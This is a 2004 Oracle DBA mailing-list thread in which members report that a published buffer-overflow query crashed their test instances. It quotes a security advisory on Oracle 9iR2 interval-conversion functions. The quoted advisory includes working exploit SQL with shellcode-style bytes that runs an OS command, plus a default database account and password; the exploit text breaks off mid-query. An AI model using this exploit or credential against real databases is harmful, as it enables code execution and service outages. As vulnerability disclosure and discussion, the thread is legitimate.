Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

  • From: Jared.Still@xxxxxxxxxxx
  • To: oracle-l@xxxxxxxxxxxxx
  • Date: Thu, 26 Feb 2004 13:25:36 -0800

Mohammed,

Your email inspired my to try it on  local database.

After starting up a 9.2 database on my laptop, I ran the query.

It did indeed create the file.

The sqlplus session appears to be hung.

The instance is still up though, as I can login from another CMD window.

Next I tried running the query on a remote 9.2.0,3 instance on a Win2k
server.

It's running SAP, but as it is our test server it is generally safe crash
it without
repercussions.

Which is exactly what happened.  The query crashed the instance, killed
the service.

Agreed, it is a dangerous bug.

Jared

mkb <mkb125@xxxxxxxxx>
Sent by: oracle-l-bounce@xxxxxxxxxxxxx
 02/26/2004 12:33 PM
 Please respond to oracle-l

        To:     oracle-l@xxxxxxxxxxxxx
        cc:
        Subject:        Re: [NEWS] Oracle Database 9ir2 Interval Conversion
Buffer Overflow

Hmmmm.....

Oracle 9.2.0.3 on Win2K, shutdown the instance and the
Oracle service.

Pretty serious bug to me.

mohammed

--- Jared.Still@xxxxxxxxxxx wrote:
> [...]
> and can be found at the SecuriTeam web site:
> http://www.securiteam.com
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate,
> Independent.
>
> Get your security news from a reliable source.
>

> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer
> Overflow
> Oracle Database Server is one of the most used
> database servers in the
> world, it was marketed as being unbreakable and many
> people thinks that is
> one of the most secure database server in the
> market.
>
> Oracle Database Server provides two functions that
> can be used with PL/SQL
> to convert numbers to date/time intervals, these
> functions have buffer
> overflow vulnerabilities.
> Vulnerable Systems:
>  * Oracle Database version 9ir2 and prior
>
> When any of these conversion functions are called
> with a long string as a
> second parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the next PL/SQL:
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from
> dual;
> SELECT NUMTODSINTERVAL(1,'longstringhere') from
> dual;
>
> Any Oracle Database user can exploit this
> vulnerability because access to
> these functions can't be restricted. Exploitation of
> this vulnerability
> allow an attacker to execute arbitrary code, also it
> can be exploited to
> cause DOS (Denial of service) killing Oracle server
> process. An attacker
> can complete compromise the OS and database if
> Oracle is running on
> Windows platform, because Oracle must run under the
> local System account
> or under an administrative account. If Oracle is
> running on *nix then only
> the database could be compromised because Oracle
> runs mostly under oracle
> user which has restricted permissions.
>
> Important: Exploitation of these vulnerabilities
> becomes easy if Oracle Internet
> Directory has been deployed, because Oracle Internet
> Directory creates a
> database user called ODSCOMMON that has a default
> password ODSCOMMON, this
> password can not be changed, so any attacker can use
> this user to connect
> to database and exploit these vulnerabilities.
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and
> Linux confirm these vulnerabilities. Versions
> running in other OS
> platforms are believed to be affected too. Previous
> Oracle Database Server
> versions could be affected by these vulnerabilities.
>

> Exploits:
> -- These exploits should work on Windows 2000 Server
> and Windows XP, not
> tested on Windows 2003.
> -- Run any command at the end of the string

NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35)
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32)||'echo ARE YOU SURE?
> >c:\Unbreakable.txt')
> ?FROM DUAL;
>
> SELECT

NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'